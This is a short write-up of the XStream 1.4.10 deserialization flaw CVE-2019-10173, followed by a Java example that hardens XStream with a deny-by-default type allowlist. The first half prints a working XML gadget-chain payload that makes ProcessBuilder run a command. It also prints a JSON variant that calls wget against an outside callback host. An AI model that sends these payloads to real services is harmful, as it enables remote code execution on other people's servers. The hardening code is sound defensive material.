XStream 1.4.10 deserialization vulnerability

0x00 CVE-2019-10173

Reference: http://x-stream.github.io/changes.html#1.4.11

0x01 Payload

<sorted-set>
  <string>foo</string>
  <dynamic-proxy>
    <interface>java.lang.Comparable</interface>
    <handler class="java.beans.EventHandler">
      <target class="java.lang.ProcessBuilder">
        <command>
          <string>ping</string>
          <string>xxxxx</string>
        </command>
      </target>
      <action>start</action>
    </handler>
  </dynamic-proxy>
</sorted-set>

Possible variant (does not seem to work):

{"sorted-set":{"string":"foo","dynamic-proxy":{"interface":"java.lang.Comparable","handler":{"class":"java.beans.EventHandler","target":{"class":"java.lang.ProcessBuilder","command":["wget","http://2nmquk.ceye.io"]},"action":"start"}}}}

0x02 Notes

The XML payload works. The JSON version is my own rewrite of it and may not work; the main problem is that I do not know how to map that XML attribute into JSON form. XStream's deserialization function does accept both JSON and XML input, though.
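The payload above only works when XStream resolves arbitrary class names from the input. The following is an added example (not code from the original post, and not XStream's own sample code) showing how to build an XStream instance that denies every type by default and allows only the application's own types; the `Greeting` class, the alias and both input strings are constructed for this example, and it assumes XStream 1.4.10 or later on the classpath.

```java
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.XStreamException;
import com.thoughtworks.xstream.security.NoTypePermission;

public class XStreamHardening {
    // The only application type we expect on the wire (constructed for this example).
    public static class Greeting {
        public String text;
    }

    // Build an XStream instance with an explicit allowlist: everything is denied
    // first, then only the types the application actually deserializes are re-enabled.
    public static XStream hardened() {
        XStream xs = new XStream();
        xs.addPermission(NoTypePermission.NONE);              // deny all types
        xs.allowTypes(new Class[] { Greeting.class, String.class });
        xs.alias("greeting", Greeting.class);
        return xs;
    }

    // Returns true if the document deserializes, false if the security framework
    // rejected it (ForbiddenClassException extends XStreamException).
    public static boolean accepts(XStream xs, String document) {
        try {
            xs.fromXML(document);
            return true;
        } catch (XStreamException e) {
            return false;
        }
    }

    public static void main(String[] args) {
        XStream xs = hardened();
        String benign = "<greeting><text>hi</text></greeting>";
        // Same outer structure as the payload above, with the dangerous handler left out:
        // the very first type that is not on the allowlist (TreeSet for <sorted-set>)
        // already aborts deserialization, so the handler is never even parsed.
        String gadgetShape = "<sorted-set><string>foo</string><dynamic-proxy>"
            + "<interface>java.lang.Comparable</interface></dynamic-proxy></sorted-set>";
        System.out.println("benign accepted:  " + accepts(xs, benign));
        System.out.println("gadget accepted:  " + accepts(xs, gadgetShape));
    }
}
```

The same allowlist applies regardless of the input driver, so the JSON form discussed above is rejected by the same check once it resolves a class name that is not allowed.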